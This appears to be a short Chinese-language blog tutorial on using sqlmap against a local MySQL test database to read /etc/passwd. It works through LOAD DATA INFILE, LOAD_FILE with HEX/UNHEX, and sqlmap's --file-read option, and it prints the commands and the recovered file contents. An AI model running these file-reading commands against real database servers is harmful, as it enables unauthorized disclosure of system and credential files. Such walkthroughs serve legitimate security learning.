使用sqlmap读取/etc/passwd文件内容
1.连接数据库,建立shell交互
root@kaliPC:~# sqlmap -d mysql://test:test@localhost:3306/test --sql-shell
2.读取passwd文件写入数据库
sql-shell> LOAD DATA INFILE '/etc/passwd' INTO TABLE testfile FIELDS TERMINATED BY 'fuck' (filein)
3.查看写入内容
sql-shell> select * from testfile
以下为部分截图
备注:如果在实际操作过程遇到二进制编码的问题,可先使用hex()函数导出数据到/tmp/test,然后再LOAD DATA写入数据库
sql-shell> select HEX(LOAD_FILE('/etc/passwd')) INTO DUMPFILE '/tmp/test'
select HEX(LOAD_FILE('/etc/passwd')) INTO DUMPFILE '/tmp/test': 'NULL'
此时的test文件中显示为二进制文件
写入数据库二进制文件
sql-shell> LOAD DATA INFILE '/tmp/test' INTO TABLE testfile FIELDS TERMINATED BY 'fuck' (filein)
写入成功后可使用sql-shell直接查看内容
如果有更多需求可结合使用unhex()函数,如
sql-shell> select MID(filein,1,1024) from testfile
[10:06:16] [INFO] fetching SQL SELECT statement query output: 'select MID(filein,1,1024) from testfile'
select MID(filein,1,1024) from testfile [2]:
[*]
[*] 726F6F743A783A303A303A726F6F743A2F726F6F743A2F62696E2F626173680A6461656D6F6E3A783A313A313A6461656D6F6E3A2F7573722F7362696E3A2F7573722F7362696E2F6E6F6C6F67696E0A62696E3A783A323A323A62696E3A2F62696E3A2F7573722F7362696E2F6E6F6C6F67696E0A7379733A783A333A333A7379733A2F6465763A2F7573722F7362696E2F6E6F6C6F67696E0A73796E633A783A343A36353533343A73796E633A2F62696E3A2F62696E2F73796E630A67616D65733A783A353A36303A67616D65733A2F7573722F67616D65733A2F7573722F7362696E2F6E6F6C6F67696E0A6D616E3A783A363A31323A6D616E3A2F7661722F63616368652F6D616E3A2F7573722F7362696E2F6E6F6C6F67696E0A6C703A783A373A373A6C703A2F7661722F73706F6F6C2F6C70643A2F7573722F7362696E2F6E6F6C6F67696E0A6D61696C3A783A383A383A6D61696C3A2F7661722F6D61696C3A2F7573722F7362696E2F6E6F6C6F67696E0A6E6577733A783A393A393A6E6577733A2F7661722F73706F6F6C2F6E6577733A2F7573722F7362696E2F6E6F6C6F67696E0A757563703A783A31303A31303A757563703A2F7661722F73706F6F6C2F757563703A2F7573722F7362696E2F6E6F6C6F67696E0A70726F78793A783A31333A31333A70726F78793A2F62696E3A2F7573722F7362696E2F6E
sql-shell> select UNHEX(MID(filein,1,1024)) from testfile
[10:06:35] [INFO] fetching SQL SELECT statement query output: 'select UNHEX(MID(filein,1,1024)) from testfile'
select UNHEX(MID(filein,1,1024)) from testfile [2]:
[*]
[*] root:x:0:0:root:/root:/bin/bash\ndaemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin\nbin:x:2:2:bin:/bin:/usr/sbin/nologin\nsys:x:3:3:sys:/dev:/usr/sbin/nologin\nsync:x:4:65534:sync:/bin:/bin/sync\ngames:x:5:60:games:/usr/games:/usr/sbin/nologin\nman:x:6:12:man:/var/cache/man:/usr/sbin/nologin\nlp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin\nmail:x:8:8:mail:/var/mail:/usr/sbin/nologin\nnews:x:9:9:news:/var/spool/news:/usr/sbin/nologin\nuucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin\nproxy:x:13:13:proxy:/bin:/usr/sbin/nr
换个思路,可以使用sqlmap自带选项查询
root@kaliPC:# sqlmap -d mysql://test:test@localhost:3306/test --file-read=/etc/passwd
......
do you want confirmation that the remote file '/etc/passwd' has been successfully downloaded from the back-end DBMS file system? [Y/n]
[11:10:30] [INFO] the local file /root/.sqlmap/output/localhost/files/_etc_passwd and the remote file /etc/passwd have the same size (2736b)
files saved to [1]:
[*] /root/.sqlmap/output/localhost/files/_etc_passwd (same file)
可以看出,sqlmap读取了文件把将其保存到了本地路径.
评论